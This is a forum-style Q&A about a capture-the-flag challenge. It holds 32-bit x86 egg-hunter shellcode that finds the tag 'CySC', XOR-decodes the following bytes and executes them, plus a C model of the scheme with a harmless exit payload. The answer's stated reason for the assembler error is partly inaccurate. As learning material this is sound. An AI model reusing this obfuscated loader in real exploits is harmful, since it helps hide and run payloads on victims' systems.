I'm writing shellcode to solve an infosec challenge. It first has to find an egg, "CySC", in memory, then XOR the 255 bytes that follow the egg tag's memory address, using the last byte of the egg tag's memory address as the key. This is what I have come up with so far, but I get the error mentioned above on line 19, the `xor [eax + bl],cl` instruction.
BITS 32
start:
mov eax, 0xb7469FFF ;this is one byte before the start of where the code "CySC" can be found
mov ebx, 'CySC' ;obvious.
compare:
inc eax ;move to the next byte, which is the start of the range where "CySC" can be found
cmp [eax], ebx ;does the data located at eax equal "CySC" ?
jne compare ;Loop if not, increment eax by one and check next mem add
foundit:
xor ecx, ecx ;zero out ecx to store the last byte of eax's mem address where "CySC" is located. Remember this is what we will xor the rest of the shellcode with.
mov cl, al ;move the last byte of eax into cl
xor ebx, ebx ;zero out ebx for use as a counter in the next loop
deobfuscate:
dec bl ;subtract 1 from bl, the first loop will be 255 (ff)
xor [eax+bl],cl ;look at what is located at eax+bl (eax+255 first loop)
cmp [bl], 4 ;is bl counter equal to 4?
jne deobfuscate ;if it is continue, if not loop
runshellcode:
add eax, 4 ;add 4 to x as this is our egg tag "CySC"
call eax ;execute shellcode at eax
Any suggestions would be much appreciated!
Answer 0 (score: 0)
The problem was in "xor [eax + bl],al", because the [] brackets mean that everything inside them is a pointer to a value located at a memory address... so bl = 0xFF in the first loop, which is obviously an invalid mem address. So I changed it to "xor [eax + ebx],al" to pull the value located at ebx, and it worked. Got my flag! Thanks for the help.
BITS 32
start:
mov eax, 0xb7469FFF ;one byte before the region where "CySC" can be found
mov ebx, 'CySC' ;the egg tag, as a little-endian dword
compare:
inc eax ;next candidate address
cmp [eax], ebx ;does the dword at eax equal "CySC" ?
jne compare ;keep scanning until the tag is found
foundit:
xor ecx, ecx
mov cl, al ;key = low byte of the tag's address (al and cl now hold the same value)
xor ebx, ebx ;ebx = 0; bl is the byte counter
deobfuscate:
dec bl ;first pass: bl = 0xFF
xor [eax+ebx],al ;decode the byte at tag+bl with the key; ebx (unlike bl) is legal in an address
cmp bl, 0x4 ;stop after offset 4, i.e. just past the 4-byte tag
jne deobfuscate
execute:
add eax, 4 ;skip the tag itself
call eax ;run the decoded shellcode
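A C model of the encode/decode scheme the question and answer describe, added here as an example; it is not part of the original post or answer (the assembly on the page is the poster's own). It assumes the layout the stub implies: the 4-byte tag "CySC", followed by payload bytes XORed with the low byte of the tag's address, and a decoder that walks offsets 0xFF down to 0x04, so 252 bytes (offsets 4..255), not 255, are decoded. The encoder, the memory region and the placement offsets are constructed for the example; the payload is a 5-byte Linux x86 exit stub (`xor eax,eax; inc eax; int 0x80`).

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define EGG_LEN      4
#define DECODE_START 0x04    /* first decoded offset: the byte right after the tag */
#define DECODE_END   0x100   /* one past the last decoded offset (bl starts at 0xFF) */
#define PAYLOAD_MAX  (DECODE_END - DECODE_START)   /* 252 bytes */

static const uint8_t EGG[EGG_LEN] = { 'C', 'y', 'S', 'C' };

/* Mirrors the compare loop: scan linearly for the 4-byte tag.
   Returns a pointer to the tag, or NULL if it is not within `len` bytes. */
static uint8_t *find_egg(uint8_t *start, size_t len)
{
    for (size_t i = 0; i + EGG_LEN <= len; i++) {
        if (memcmp(start + i, EGG, EGG_LEN) == 0)
            return start + i;
    }
    return NULL;
}

/* Mirrors `mov cl, al`: the key is the low byte of the tag's address.
   Note that a tag landing at an address ending in 0x00 gives key 0, and the
   "encoding" becomes a no-op. */
static uint8_t key_for(const uint8_t *egg)
{
    return (uint8_t)(uintptr_t)egg;
}

/* Mirrors the deobfuscate loop: XOR offsets 0xFF down to 0x04 with the key.
   Returns the number of bytes touched (252). */
static size_t decode_in_place(uint8_t *egg)
{
    uint8_t key = key_for(egg);
    size_t n = 0;
    for (unsigned off = DECODE_END - 1; off >= DECODE_START; off--) {
        egg[off] ^= key;
        n++;
    }
    return n;
}

/* Encoder side (constructed for this example): write the tag at `egg`, then the
   payload XORed with the key the stub will derive from that address. Unused
   decoder range is filled so that it decodes to NOPs (0x90). */
static int encode_at(uint8_t *egg, const uint8_t *payload, size_t plen)
{
    if (plen > PAYLOAD_MAX)
        return -1;
    memcpy(egg, EGG, EGG_LEN);
    uint8_t key = key_for(egg);
    for (size_t i = 0; i < plen; i++)
        egg[DECODE_START + i] = payload[i] ^ key;
    memset(egg + DECODE_START + plen, 0x90 ^ key, PAYLOAD_MAX - plen);
    return 0;
}

/* Constructed memory region standing in for the hunted address range. */
static uint8_t region[4096];

/* Linux x86 exit(): xor eax,eax; inc eax; int 0x80 */
static const uint8_t sample_payload[] = { 0x31, 0xc0, 0x40, 0xcd, 0x80 };

/* End-to-end check: encode at `egg_offset` inside `region`, hunt from the start
   of the region, decode, and compare with the original payload. Returns 1 on
   success, 0 on any mismatch or if the egg would not fit. */
static int roundtrip(size_t egg_offset)
{
    if (egg_offset + DECODE_END > sizeof region)
        return 0;
    memset(region, 0, sizeof region);
    uint8_t *egg = region + egg_offset;
    if (encode_at(egg, sample_payload, sizeof sample_payload) != 0)
        return 0;
    uint8_t *found = find_egg(region, sizeof region);
    if (found != egg)
        return 0;
    if (decode_in_place(found) != PAYLOAD_MAX)
        return 0;
    return memcmp(found + EGG_LEN, sample_payload, sizeof sample_payload) == 0;
}

int main(void)
{
    int ok = roundtrip(0x237);
    printf("roundtrip at offset 0x237: %s (key 0x%02x)\n",
           ok ? "ok" : "FAILED", key_for(region + 0x237));
    return ok ? 0 : 1;
}
```

Build with `cc -o egg egg.c && ./egg`. Two things this model glosses over that matter for the real stub: `cmp [eax], ebx` reads straight through memory from a hard-coded address, so in a real process it faults on the first unmapped page it crosses (general-purpose egg hunters probe each page with a syscall before touching it), and a 4-byte tag can be matched by the hunter's own `mov ebx, 'CySC'` immediate if the scan passes over the stub, which is why many hunters use the tag twice in a row.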